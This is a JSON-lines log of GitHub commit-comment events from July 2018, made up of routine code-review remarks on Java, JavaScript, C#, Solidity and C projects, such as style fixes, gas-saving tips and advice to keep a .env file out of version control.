{"id":"7905566642","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29563716,"position":1,"line":41,"path":"corelibrary/src/main/java/com/axway/ats/core/validation/types/TypeRegex.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T09:39:29Z","updated_at":"2018-07-02T09:39:29Z","author_association":"OWNER","body":"keep this file"}},"created_at":"2018-07-02T09:39:29Z"}
{"id":"7905567723","type":"CommitCommentEvent","actor":{"login":"gyorkibence"},"repo":{"name":"green-fox-academy/Norlandia"},"payload":{"comment":{"id":29563719,"position":null,"line":null,"path":null,"commit_id":"6242f936730bcc7657a41a33ed27f3a3810335c5","created_at":"2018-07-02T09:39:41Z","updated_at":"2018-07-02T09:39:41Z","author_association":"NONE","body":"nice, but our styleguide use one single quote instead of two :) "}},"created_at":"2018-07-02T09:39:41Z"}
{"id":"7905568044","type":"CommitCommentEvent","actor":{"login":"zk20180228"},"repo":{"name":"zk20180228/zk20180228.github.io"},"payload":{"comment":{"id":29563720,"position":1,"line":1,"path":"java学习笔记-day05","commit_id":"12ab7da91168c58b3546f73978e2e6cf3727a9f2","created_at":"2018-07-02T09:39:45Z","updated_at":"2018-07-02T09:39:45Z","author_association":"OWNER","body":"\r\npublic class Car {\tString color;// 成员变量\tint num; // 成员变量 \t// 成员函数\tvoid run() {\t\tSystem.out.println(color + \"的车，轮胎数：\" + num + \"个，跑起来了\");\t}}\r\n--\r\n\r\n\r\n"}},"created_at":"2018-07-02T09:39:45Z"}
{"id":"7905570647","type":"CommitCommentEvent","actor":{"login":"parmentf"},"repo":{"name":"Inist-CNRS/lodex-workers"},"payload":{"comment":{"id":29563725,"position":82,"line":31,"path":"package.json","commit_id":"d41e76a57510ea5da61eedfbc4da6bbcaf65a154","created_at":"2018-07-02T09:40:15Z","updated_at":"2018-07-02T09:40:15Z","author_association":"NONE","body":"It seems the lines from 31 to 33 have been copied from [ezmaster-jekyll](https://github.com/Inist-CNRS/ezmaster-jekyll/blob/master/package.json), but without adaptation to the project."}},"created_at":"2018-07-02T09:40:15Z"}
{"id":"7905572856","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"MNKCrypto/Splitter"},"payload":{"comment":{"id":29563732,"position":74,"line":61,"path":"contracts/Splitter.sol","commit_id":"c4949ebf1726bec392800646f352dd4c8b36e417","created_at":"2018-07-02T09:40:38Z","updated_at":"2018-07-02T09:40:38Z","author_association":"NONE","body":"This way of doing can help you debug indeed. There is a small problem though. Only external systems can find out whether the transfer happened. What if the caller was a derivative contract that had to do something else if, and only if, the transfer had taken place.\r\nSo here we prefer rolling back everything `require(x.send())` or more idiomatic `x.transfer()`.\r\nRemember the first principles, take any opportunity to fail."}},"created_at":"2018-07-02T09:40:38Z"}
{"id":"7905573199","type":"CommitCommentEvent","actor":{"login":"Soumil07"},"repo":{"name":"TheLearneer/croyale"},"payload":{"comment":{"id":29563733,"position":22,"line":14,"path":"lib/util/Util.js","commit_id":"4da09ed351118283176d0b0c2462c0d8b1a6020a","created_at":"2018-07-02T09:40:42Z","updated_at":"2018-07-02T09:40:42Z","author_association":"NONE","body":"Better to use a RegExp here."}},"created_at":"2018-07-02T09:40:42Z"}
{"id":"7905573442","type":"CommitCommentEvent","actor":{"login":"zk20180228"},"repo":{"name":"zk20180228/zk20180228.github.io"},"payload":{"comment":{"id":29563734,"position":null,"line":null,"path":null,"commit_id":"12ab7da91168c58b3546f73978e2e6cf3727a9f2","created_at":"2018-07-02T09:40:45Z","updated_at":"2018-07-02T09:40:45Z","author_association":"OWNER","body":"12ab7da91168c58b3546f73978e2e6cf3727a9f2"}},"created_at":"2018-07-02T09:40:45Z"}
{"id":"7905573551","type":"CommitCommentEvent","actor":{"login":"fredericDelaporte"},"repo":{"name":"maca88/NHibernate-Caches"},"payload":{"comment":{"id":29563735,"position":22,"line":22,"path":"StackExRedis/NHibernate.Caches.StackExRedis.Tests/JsonRedisSerializer.cs","commit_id":"b717dcfdab24ca657a87ed12177461fb1bdad1c6","created_at":"2018-07-02T09:40:47Z","updated_at":"2018-07-02T09:40:47Z","author_association":"NONE","body":"An `IUserType` is not supposed to reach the cache as is. Its `Disassemble` method should be implemented by the user in order to yield a disassembled state.\r\nSo maybe reword this to something like: `If the cached <see cref=\"IUserType\"/> have a <see cref=\"IUserType.Disassemble\"/> method which does not yield only basic value types or array of them, their return type has to be registered explicitly by <see cref=\"RegisterType\"/> method.`"}},"created_at":"2018-07-02T09:40:47Z"}
{"id":"7905574203","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29563736,"position":1,"line":17,"path":"corelibrary/src/main/java/com/axway/ats/core/ssh/JschSftpClient.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T09:40:54Z","updated_at":"2018-07-02T09:40:54Z","author_association":"OWNER","body":"keep this file"}},"created_at":"2018-07-02T09:40:54Z"}
{"id":"7905575920","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29563738,"position":1,"line":16,"path":"corelibrary/src/main/java/com/axway/ats/core/ssh/JschSshClient.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T09:41:14Z","updated_at":"2018-07-02T09:41:14Z","author_association":"OWNER","body":"keep this file"}},"created_at":"2018-07-02T09:41:14Z"}
{"id":"7905580612","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29563742,"position":1,"line":31,"path":"corelibrary/src/main/java/com/axway/ats/core/utils/StringUtils.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T09:42:07Z","updated_at":"2018-07-02T09:42:07Z","author_association":"OWNER","body":"keep this file"}},"created_at":"2018-07-02T09:42:07Z"}
{"id":"7905581477","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"MNKCrypto/Splitter"},"payload":{"comment":{"id":29563744,"position":4,"line":3,"path":"migrations/2_deploy_contracts.js","commit_id":"e7af14ff03d1bf7fe93c7e9a62399a3433d9a86e","created_at":"2018-07-02T09:42:16Z","updated_at":"2018-07-02T09:42:16Z","author_association":"NONE","body":"You can have accounts easily:\r\n\r\n```javascript\r\nmodule.exports = function(deployer, network, accounts) {\r\n```"}},"created_at":"2018-07-02T09:42:16Z"}
{"id":"7905584734","type":"CommitCommentEvent","actor":{"login":"fredericDelaporte"},"repo":{"name":"maca88/NHibernate-Caches"},"payload":{"comment":{"id":29563746,"position":195,"line":195,"path":"StackExRedis/NHibernate.Caches.StackExRedis.Tests/JsonRedisSerializer.cs","commit_id":"b717dcfdab24ca657a87ed12177461fb1bdad1c6","created_at":"2018-07-02T09:42:53Z","updated_at":"2018-07-02T09:42:53Z","author_association":"NONE","body":"It sounds like this sentence wording has been partially amended... I do not make much sens of it in its current state."}},"created_at":"2018-07-02T09:42:53Z"}
{"id":"7905585505","type":"CommitCommentEvent","actor":{"login":"markkovari"},"repo":{"name":"green-fox-academy/MrBB7"},"payload":{"comment":{"id":29563750,"position":13,"line":13,"path":"week -2(Orientation)/day3/Anagramm/Anagramm/Services/AnagramServices.cs","commit_id":"19ea39e02de65303edb857605dd7631c9447cf90","created_at":"2018-07-02T09:43:02Z","updated_at":"2018-07-02T09:43:02Z","author_association":"NONE","body":"If you are looking for a really badass LINQ solution you can check [this link](http://www.blackwasp.co.uk/linqanagramcheck.aspx). ;) And if you want it we can get it through. "}},"created_at":"2018-07-02T09:43:02Z"}
{"id":"7905586505","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29563753,"position":1,"line":28,"path":"corelibrary/src/test/java/com/axway/ats/core/dbaccess/Test_DatabaseProviderFactory_createDbConnection.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T09:43:14Z","updated_at":"2018-07-02T09:43:14Z","author_association":"OWNER","body":"keep this file"}},"created_at":"2018-07-02T09:43:14Z"}
{"id":"7905586981","type":"CommitCommentEvent","actor":{"login":"gyorkibence"},"repo":{"name":"green-fox-academy/mr-jester"},"payload":{"comment":{"id":29563754,"position":231,"line":231,"path":"week-07/day03/gflogo.html","commit_id":"aa831ced5ba5dbb8ae8c5f36529030c039d5e111","created_at":"2018-07-02T09:43:19Z","updated_at":"2018-07-02T09:43:19Z","author_association":"NONE","body":"missing semicolon"}},"created_at":"2018-07-02T09:43:19Z"}
{"id":"7905587465","type":"CommitCommentEvent","actor":{"login":"gyorkibence"},"repo":{"name":"green-fox-academy/mr-jester"},"payload":{"comment":{"id":29563758,"position":232,"line":232,"path":"week-07/day03/gflogo.html","commit_id":"aa831ced5ba5dbb8ae8c5f36529030c039d5e111","created_at":"2018-07-02T09:43:24Z","updated_at":"2018-07-02T09:43:24Z","author_association":"NONE","body":"here too"}},"created_at":"2018-07-02T09:43:24Z"}
{"id":"7905587896","type":"CommitCommentEvent","actor":{"login":"fredericDelaporte"},"repo":{"name":"maca88/NHibernate-Caches"},"payload":{"comment":{"id":29563759,"position":227,"line":227,"path":"StackExRedis/NHibernate.Caches.StackExRedis.Tests/JsonRedisSerializer.cs","commit_id":"b717dcfdab24ca657a87ed12177461fb1bdad1c6","created_at":"2018-07-02T09:43:28Z","updated_at":"2018-07-02T09:43:28Z","author_association":"NONE","body":"`Reduces the json size by shortening the metadata properties names.` sounds more correct to me."}},"created_at":"2018-07-02T09:43:28Z"}
{"id":"7905587972","type":"CommitCommentEvent","actor":{"login":"Surendrajat"},"repo":{"name":"TwrpBuilder/android_device_motorola_owens"},"payload":{"comment":{"id":29563760,"position":null,"line":null,"path":null,"commit_id":"d945eec71875e549e1d0f8fb9208cb01b1ed723e","created_at":"2018-07-02T09:43:29Z","updated_at":"2018-07-02T09:43:29Z","author_association":"MEMBER","body":"Docker image :grin:"}},"created_at":"2018-07-02T09:43:29Z"}
{"id":"7905587973","type":"CommitCommentEvent","actor":{"login":"TheLearneer"},"repo":{"name":"TheLearneer/croyale"},"payload":{"comment":{"id":29563761,"position":22,"line":14,"path":"lib/util/Util.js","commit_id":"4da09ed351118283176d0b0c2462c0d8b1a6020a","created_at":"2018-07-02T09:43:29Z","updated_at":"2018-07-02T09:43:29Z","author_association":"OWNER","body":"I am really bad at regex :sweat: \r\nSo if you have the solution I would love to see it."}},"created_at":"2018-07-02T09:43:29Z"}
{"id":"7905589457","type":"CommitCommentEvent","actor":{"login":"gyorkibence"},"repo":{"name":"green-fox-academy/mr-jester"},"payload":{"comment":{"id":29563763,"position":2,"line":2,"path":"week-07/day02/simple-timeout.js","commit_id":"51e358597bb022615722444461081bd5874ec166","created_at":"2018-07-02T09:43:46Z","updated_at":"2018-07-02T09:43:46Z","author_association":"NONE","body":"the console.log should be in a new row"}},"created_at":"2018-07-02T09:43:46Z"}
{"id":"7905589897","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29563765,"position":1,"line":13,"path":"corelibrary/src/main/java/com/axway/ats/core/threads/ImportantThread.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T09:43:51Z","updated_at":"2018-07-02T09:43:51Z","author_association":"OWNER","body":"check this file"}},"created_at":"2018-07-02T09:43:51Z"}
{"id":"7905590317","type":"CommitCommentEvent","actor":{"login":"markkovari"},"repo":{"name":"green-fox-academy/MrBB7"},"payload":{"comment":{"id":29563766,"position":22,"line":22,"path":"week -2(Orientation)/day3/Anagramm/Anagramm/Services/AnagramServices.cs","commit_id":"19ea39e02de65303edb857605dd7631c9447cf90","created_at":"2018-07-02T09:43:55Z","updated_at":"2018-07-02T09:43:55Z","author_association":"NONE","body":"I feel like it is a bit redundant, you can use a static method or the method above. It is not necessary to store the boolean value."}},"created_at":"2018-07-02T09:43:55Z"}
{"id":"7905591153","type":"CommitCommentEvent","actor":{"login":"gyorkibence"},"repo":{"name":"green-fox-academy/mr-jester"},"payload":{"comment":{"id":29563768,"position":4,"line":4,"path":"week-07/day02/multiple-timeout.js","commit_id":"097d24d6b86310100bb6309bf9c5fda574f0fef0","created_at":"2018-07-02T09:44:05Z","updated_at":"2018-07-02T09:44:05Z","author_association":"NONE","body":"missing semicolon"}},"created_at":"2018-07-02T09:44:05Z"}
{"id":"7905591243","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29563769,"position":1,"line":159,"path":"corelibrary/src/main/java/com/axway/ats/core/utils/ClasspathUtils.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T09:44:06Z","updated_at":"2018-07-02T09:44:06Z","author_association":"OWNER","body":"check this file"}},"created_at":"2018-07-02T09:44:06Z"}
{"id":"7905591619","type":"CommitCommentEvent","actor":{"login":"gyorkibence"},"repo":{"name":"green-fox-academy/mr-jester"},"payload":{"comment":{"id":29563770,"position":7,"line":7,"path":"week-07/day02/multiple-timeout.js","commit_id":"097d24d6b86310100bb6309bf9c5fda574f0fef0","created_at":"2018-07-02T09:44:10Z","updated_at":"2018-07-02T09:44:10Z","author_association":"NONE","body":"missing semicolon"}},"created_at":"2018-07-02T09:44:10Z"}
{"id":"7905591649","type":"CommitCommentEvent","actor":{"login":"aboletti"},"repo":{"name":"cms-bph-trigger/cmssw"},"payload":{"comment":{"id":29563771,"position":105,"line":506,"path":"DQMOffline/Trigger/plugins/BPHMonitor.cc","commit_id":"e92316b240a2e7cbc2689b502318839ecced5f87","created_at":"2018-07-02T09:44:10Z","updated_at":"2018-07-02T09:44:10Z","author_association":"MEMBER","body":"@anigamova \r\nsimilar as above, the two \"matchToTrigger\" functions can be called just once per muon, before entering the \"switch\", by defining two boolean variables"}},"created_at":"2018-07-02T09:44:10Z"}
{"id":"7905592097","type":"CommitCommentEvent","actor":{"login":"gyorkibence"},"repo":{"name":"green-fox-academy/mr-jester"},"payload":{"comment":{"id":29563773,"position":10,"line":10,"path":"week-07/day02/multiple-timeout.js","commit_id":"097d24d6b86310100bb6309bf9c5fda574f0fef0","created_at":"2018-07-02T09:44:14Z","updated_at":"2018-07-02T09:44:14Z","author_association":"NONE","body":"missing semicolon"}},"created_at":"2018-07-02T09:44:14Z"}
{"id":"7905592737","type":"CommitCommentEvent","actor":{"login":"Boeing13"},"repo":{"name":"wasd98/Ohayo"},"payload":{"comment":{"id":29563775,"position":null,"line":null,"path":null,"commit_id":"84a47cfb2d4415f4179bae076bb8db1fd0e31c3c","created_at":"2018-07-02T09:44:21Z","updated_at":"2018-07-02T09:44:21Z","author_association":"COLLABORATOR","body":"hoàn thành giao diện trang index, nhưng câu query cần thay đổi vì còn liên quan đến user là ai"}},"created_at":"2018-07-02T09:44:21Z"}
{"id":"7905592820","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29563776,"position":1,"line":220,"path":"corelibrary/src/main/java/com/axway/ats/core/utils/HostUtils.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T09:44:22Z","updated_at":"2018-07-02T09:44:22Z","author_association":"OWNER","body":"keep this file"}},"created_at":"2018-07-02T09:44:22Z"}
{"id":"7905593078","type":"CommitCommentEvent","actor":{"login":"Najbar"},"repo":{"name":"Najbar/hallo-world"},"payload":{"comment":{"id":29563777,"position":null,"line":null,"path":null,"commit_id":"daac98eb3f46f535272d17659548d02007a35634","created_at":"2018-07-02T09:44:24Z","updated_at":"2018-07-02T09:44:24Z","author_association":"OWNER","body":"my new repository"}},"created_at":"2018-07-02T09:44:24Z"}
{"id":"7905594406","type":"CommitCommentEvent","actor":{"login":"markkovari"},"repo":{"name":"green-fox-academy/MrBB7"},"payload":{"comment":{"id":29563779,"position":10,"line":10,"path":"week -2(Orientation)/day3/Anagramm/Anagramm/Services/IAnagram.cs","commit_id":"19ea39e02de65303edb857605dd7631c9447cf90","created_at":"2018-07-02T09:44:39Z","updated_at":"2018-07-02T09:44:39Z","author_association":"NONE","body":"So the interface does not has to declare this method. Not necessarily."}},"created_at":"2018-07-02T09:44:39Z"}
{"id":"7905594825","type":"CommitCommentEvent","actor":{"login":"AllenZho"},"repo":{"name":"F-loat/mpvue-entry"},"payload":{"comment":{"id":29563780,"position":null,"line":null,"path":null,"commit_id":"a0bd7cc43d7715aa833a9e041bd44c8da7636d51","created_at":"2018-07-02T09:44:44Z","updated_at":"2018-07-02T09:44:44Z","author_association":"NONE","body":"When I use '/'+'/', it’s fine."}},"created_at":"2018-07-02T09:44:44Z"}
{"id":"7905595348","type":"CommitCommentEvent","actor":{"login":"gyorkibence"},"repo":{"name":"green-fox-academy/mr-jester"},"payload":{"comment":{"id":29563782,"position":44,"line":44,"path":"week-07/day02/prime-squares.html","commit_id":"f8d0acaffa227ab27174222f58c6108d19282506","created_at":"2018-07-02T09:44:50Z","updated_at":"2018-07-02T09:44:50Z","author_association":"NONE","body":"please write your scripts in a separate file"}},"created_at":"2018-07-02T09:44:50Z"}
{"id":"7905595431","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"NateWickstrom/splitter-solidity"},"payload":{"comment":{"id":29563783,"position":43,"line":15,"path":"contracts/Splitter.sol","commit_id":"aa407ad21b4725b42b4db4b976df554cb263c2c8","created_at":"2018-07-02T09:44:51Z","updated_at":"2018-07-02T09:44:51Z","author_association":"NONE","body":"Consider adding `indexed` where you expect the client-side to filter."}},"created_at":"2018-07-02T09:44:51Z"}
{"id":"7905596252","type":"CommitCommentEvent","actor":{"login":"zfigura"},"repo":{"name":"wine-staging/wine-staging"},"payload":{"comment":{"id":29563785,"position":null,"line":null,"path":null,"commit_id":"19db07f062fdf4c486f78e3201544f5cf5ac7f02","created_at":"2018-07-02T09:45:00Z","updated_at":"2018-07-02T09:45:00Z","author_association":"MEMBER","body":"If avcodec.h is missing configure should disable xaudio2; can you upload your config.log?"}},"created_at":"2018-07-02T09:45:00Z"}
{"id":"7905596886","type":"CommitCommentEvent","actor":{"login":"markkovari"},"repo":{"name":"green-fox-academy/MrBB7"},"payload":{"comment":{"id":29563788,"position":25,"line":25,"path":"week -2(Orientation)/day3/Anagramm/Anagramm/Startup.cs","commit_id":"19ea39e02de65303edb857605dd7631c9447cf90","created_at":"2018-07-02T09:45:08Z","updated_at":"2018-07-02T09:45:08Z","author_association":"NONE","body":"Service class name should be in singular form."}},"created_at":"2018-07-02T09:45:08Z"}
{"id":"7905597125","type":"CommitCommentEvent","actor":{"login":"gyorkibence"},"repo":{"name":"green-fox-academy/mr-jester"},"payload":{"comment":{"id":29563791,"position":5,"line":5,"path":"week-07/day02/giphyAPI.js","commit_id":"0f9ce1dc3f67226a638cfad71edc1a825bb285b9","created_at":"2018-07-02T09:45:11Z","updated_at":"2018-07-02T09:45:11Z","author_association":"NONE","body":"missing semicolon"}},"created_at":"2018-07-02T09:45:11Z"}
{"id":"7905598685","type":"CommitCommentEvent","actor":{"login":"gyorkibence"},"repo":{"name":"green-fox-academy/mr-jester"},"payload":{"comment":{"id":29563792,"position":8,"line":8,"path":"week-07/day02/giphyFetch.js","commit_id":"35a1d1869996981a0269400f988c5dcee8045ae9","created_at":"2018-07-02T09:45:27Z","updated_at":"2018-07-02T09:45:27Z","author_association":"NONE","body":"missing semicolon"}},"created_at":"2018-07-02T09:45:27Z"}
{"id":"7905599353","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"NateWickstrom/splitter-solidity"},"payload":{"comment":{"id":29563793,"position":69,"line":34,"path":"contracts/Splitter.sol","commit_id":"aa407ad21b4725b42b4db4b976df554cb263c2c8","created_at":"2018-07-02T09:45:34Z","updated_at":"2018-07-02T09:45:34Z","author_association":"NONE","body":"You look ready to have a look at the `SafeMath` library."}},"created_at":"2018-07-02T09:45:34Z"}
{"id":"7905600178","type":"CommitCommentEvent","actor":{"login":"gyorkibence"},"repo":{"name":"green-fox-academy/mr-jester"},"payload":{"comment":{"id":29563795,"position":11,"line":11,"path":"week-07/day02/giphyFetch.js","commit_id":"35a1d1869996981a0269400f988c5dcee8045ae9","created_at":"2018-07-02T09:45:44Z","updated_at":"2018-07-02T09:45:44Z","author_association":"NONE","body":"nice fetch!"}},"created_at":"2018-07-02T09:45:44Z"}
{"id":"7905604085","type":"CommitCommentEvent","actor":{"login":"marcuslindblom"},"repo":{"name":"marcuslindblom/git-lfs"},"payload":{"comment":{"id":29563804,"position":null,"line":null,"path":null,"commit_id":"9cf240f73c5d5339547a58d54fcbdc67e83d9213","created_at":"2018-07-02T09:46:30Z","updated_at":"2018-07-02T09:46:30Z","author_association":"OWNER","body":"jag gillar inte den här"}},"created_at":"2018-07-02T09:46:30Z"}
{"id":"7905605024","type":"CommitCommentEvent","actor":{"login":"gyorkibence"},"repo":{"name":"green-fox-academy/mr-jester"},"payload":{"comment":{"id":29563805,"position":13,"line":13,"path":"week-07/day02/giphyFetch.js","commit_id":"35a1d1869996981a0269400f988c5dcee8045ae9","created_at":"2018-07-02T09:46:41Z","updated_at":"2018-07-02T09:46:41Z","author_association":"NONE","body":"it doesn't really works :( "}},"created_at":"2018-07-02T09:46:41Z"}
{"id":"7905605609","type":"CommitCommentEvent","actor":{"login":"gyorkibence"},"repo":{"name":"green-fox-academy/mr-jester"},"payload":{"comment":{"id":29563808,"position":24,"line":24,"path":"week-07/day02/giphyFetch.js","commit_id":"35a1d1869996981a0269400f988c5dcee8045ae9","created_at":"2018-07-02T09:46:48Z","updated_at":"2018-07-02T09:46:48Z","author_association":"NONE","body":"missing semicolon"}},"created_at":"2018-07-02T09:46:48Z"}
{"id":"7905605988","type":"CommitCommentEvent","actor":{"login":"gyorkibence"},"repo":{"name":"green-fox-academy/mr-jester"},"payload":{"comment":{"id":29563809,"position":28,"line":28,"path":"week-07/day02/giphyFetch.js","commit_id":"35a1d1869996981a0269400f988c5dcee8045ae9","created_at":"2018-07-02T09:46:52Z","updated_at":"2018-07-02T09:46:52Z","author_association":"NONE","body":"missing semicolon"}},"created_at":"2018-07-02T09:46:52Z"}
{"id":"7905606657","type":"CommitCommentEvent","actor":{"login":"markkovari"},"repo":{"name":"green-fox-academy/MrBB7"},"payload":{"comment":{"id":29563810,"position":null,"line":null,"path":null,"commit_id":"19ea39e02de65303edb857605dd7631c9447cf90","created_at":"2018-07-02T09:47:00Z","updated_at":"2018-07-02T09:47:00Z","author_association":"NONE","body":"It is cool how you make little (or big) visual upgrades to your sites 👍 \r\n"}},"created_at":"2018-07-02T09:47:00Z"}
{"id":"7905609726","type":"CommitCommentEvent","actor":{"login":"gyorkibence"},"repo":{"name":"green-fox-academy/mr-jester"},"payload":{"comment":{"id":29563813,"position":14,"line":14,"path":"week-07/day03/index.js","commit_id":"17a83b6a81d87cbdaaa29a0355db5887b4b97897","created_at":"2018-07-02T09:47:34Z","updated_at":"2018-07-02T09:47:34Z","author_association":"NONE","body":"if you don't use dotenv you don't have to add into the file "}},"created_at":"2018-07-02T09:47:34Z"}
{"id":"7905610711","type":"CommitCommentEvent","actor":{"login":"rameshvs02"},"repo":{"name":"percona/proxysql-admin-tool"},"payload":{"comment":{"id":29563815,"position":4,"line":117,"path":"proxysql-admin","commit_id":"079e8d4f7ba3d5f6676e21dcf16eac14a9f160e2","created_at":"2018-07-02T09:47:45Z","updated_at":"2018-07-02T09:47:45Z","author_association":"CONTRIBUTOR","body":"Modified code to check read permission for config file and write permission for data directory.\r\nhttps://github.com/percona/proxysql-admin-tool/commit/9e0d510832a809e5920d5b96fc5958b520b5a751 "}},"created_at":"2018-07-02T09:47:45Z"}
{"id":"7905613742","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"NateWickstrom/splitter-solidity"},"payload":{"comment":{"id":29563817,"position":11,"line":51,"path":"contracts/Splitter.sol","commit_id":"18138fd8da61fe6e4d651bc78337df5feedca2e7","created_at":"2018-07-02T09:48:19Z","updated_at":"2018-07-02T09:48:19Z","author_association":"NONE","body":"Would `require(to.send(funds), \"Failed to transfer funds\");` work for you?"}},"created_at":"2018-07-02T09:48:19Z"}
{"id":"7905614265","type":"CommitCommentEvent","actor":{"login":"gyorkibence"},"repo":{"name":"green-fox-academy/mr-jester"},"payload":{"comment":{"id":29563818,"position":null,"line":null,"path":null,"commit_id":"17a83b6a81d87cbdaaa29a0355db5887b4b97897","created_at":"2018-07-02T09:48:26Z","updated_at":"2018-07-02T09:48:26Z","author_association":"NONE","body":"please add you .env file to the gitignore, because now i can see your informations about your mysql server"}},"created_at":"2018-07-02T09:48:26Z"}
{"id":"7905614620","type":"CommitCommentEvent","actor":{"login":"rameshvs02"},"repo":{"name":"percona/proxysql-admin-tool"},"payload":{"comment":{"id":29563819,"position":29,"line":95,"path":"proxysql-admin","commit_id":"c89a7224f6f7a6041dee7bafe7ba61678b03226b","created_at":"2018-07-02T09:48:30Z","updated_at":"2018-07-02T09:48:30Z","author_association":"CONTRIBUTOR","body":"Modified code to check read permission for config file and write permission for data directory.\r\nhttps://github.com/percona/proxysql-admin-tool/commit/9e0d510832a809e5920d5b96fc5958b520b5a751 "}},"created_at":"2018-07-02T09:48:30Z"}
{"id":"7905616047","type":"CommitCommentEvent","actor":{"login":"markkovari"},"repo":{"name":"green-fox-academy/MrBB7"},"payload":{"comment":{"id":29563823,"position":21,"line":21,"path":"week -2(Orientation)/day3/GreetSomeOne/GreetSomeOne/Controllers/GreetController.cs","commit_id":"ee88c1678969e62a2e73c88f4af63b78d315f22f","created_at":"2018-07-02T09:48:47Z","updated_at":"2018-07-02T09:48:47Z","author_association":"NONE","body":"If you `want` to put into one line it can be `[HttpGet(\"/\")] ` and it will have the same effect."}},"created_at":"2018-07-02T09:48:47Z"}
{"id":"7905616961","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"NateWickstrom/splitter-solidity"},"payload":{"comment":{"id":29563825,"position":91,"line":48,"path":"contracts/Splitter.sol","commit_id":"aa407ad21b4725b42b4db4b976df554cb263c2c8","created_at":"2018-07-02T09:48:57Z","updated_at":"2018-07-02T09:48:57Z","author_association":"NONE","body":"This is the second time you `SLOAD` the balance. Can you find a way to save a bit of gas?"}},"created_at":"2018-07-02T09:48:57Z"}
{"id":"7905617243","type":"CommitCommentEvent","actor":{"login":"dvdhrm"},"repo":{"name":"dvdhrm/dbus-broker"},"payload":{"comment":{"id":29563826,"position":45,"line":267,"path":"src/launch/main.c","commit_id":"3dfcbfa8a68c8f933100ea14dc71627fd677239a","created_at":"2018-07-02T09:49:00Z","updated_at":"2018-07-02T09:49:00Z","author_association":"OWNER","body":"What do you mean? `dirwatch_dispatch()` is non-blocking, how would spurious EPOLLIN be of a problem?"}},"created_at":"2018-07-02T09:49:00Z"}
{"id":"7905617582","type":"CommitCommentEvent","actor":{"login":"posakya"},"repo":{"name":"posakya/Zapp"},"payload":{"comment":{"id":29563827,"position":null,"line":null,"path":null,"commit_id":"e04c5b4232976ebabd3cf3a84d69a0da9863ffe4","created_at":"2018-07-02T09:49:04Z","updated_at":"2018-07-02T09:49:04Z","author_association":"OWNER","body":"![screenshot_1530294373](https://user-images.githubusercontent.com/19747537/42157368-3b71108c-7e0d-11e8-9fb3-228f34b9bb65.png)\r\n"}},"created_at":"2018-07-02T09:49:04Z"}
{"id":"7905617776","type":"CommitCommentEvent","actor":{"login":"allxone"},"repo":{"name":"NVIDIA/nvidia-container-runtime"},"payload":{"comment":{"id":29563829,"position":null,"line":null,"path":null,"commit_id":"300aaf9bd4ab955d3cf1d5a8d69f7d1ca808e62c","created_at":"2018-07-02T09:49:07Z","updated_at":"2018-07-02T09:49:07Z","author_association":"NONE","body":"Hi @flx42, do you have any update on the timeline for this?\r\n\r\nThanks\r\nStefano"}},"created_at":"2018-07-02T09:49:07Z"}
{"id":"7905619144","type":"CommitCommentEvent","actor":{"login":"maryamyasaei"},"repo":{"name":"evenset/ketabdan-project"},"payload":{"comment":{"id":29563831,"position":null,"line":null,"path":null,"commit_id":"ba6ab4bbae4b743ccc0a04330d518e4c45ab6bb9","created_at":"2018-07-02T09:49:22Z","updated_at":"2018-07-02T09:49:22Z","author_association":"COLLABORATOR","body":"![screenshot from 2018-07-02 19-47-47](https://user-images.githubusercontent.com/28941044/42157408-fe81ab22-7e30-11e8-9192-8ea570537ba1.png)\r\n"}},"created_at":"2018-07-02T09:49:22Z"}
{"id":"7905620394","type":"CommitCommentEvent","actor":{"login":"vinodji21"},"repo":{"name":"vinodji21/my-first-repo"},"payload":{"comment":{"id":29563833,"position":null,"line":null,"path":null,"commit_id":"1f86c1c7216e7e554b2f95910c0a5c0947a108ec","created_at":"2018-07-02T09:49:36Z","updated_at":"2018-07-02T09:49:36Z","author_association":"OWNER","body":"newcommit"}},"created_at":"2018-07-02T09:49:36Z"}
{"id":"7905621349","type":"CommitCommentEvent","actor":{"login":"posakya"},"repo":{"name":"posakya/Zapp"},"payload":{"comment":{"id":29563836,"position":null,"line":null,"path":null,"commit_id":"e04c5b4232976ebabd3cf3a84d69a0da9863ffe4","created_at":"2018-07-02T09:49:47Z","updated_at":"2018-07-02T09:49:47Z","author_association":"OWNER","body":"screenshot"}},"created_at":"2018-07-02T09:49:47Z"}
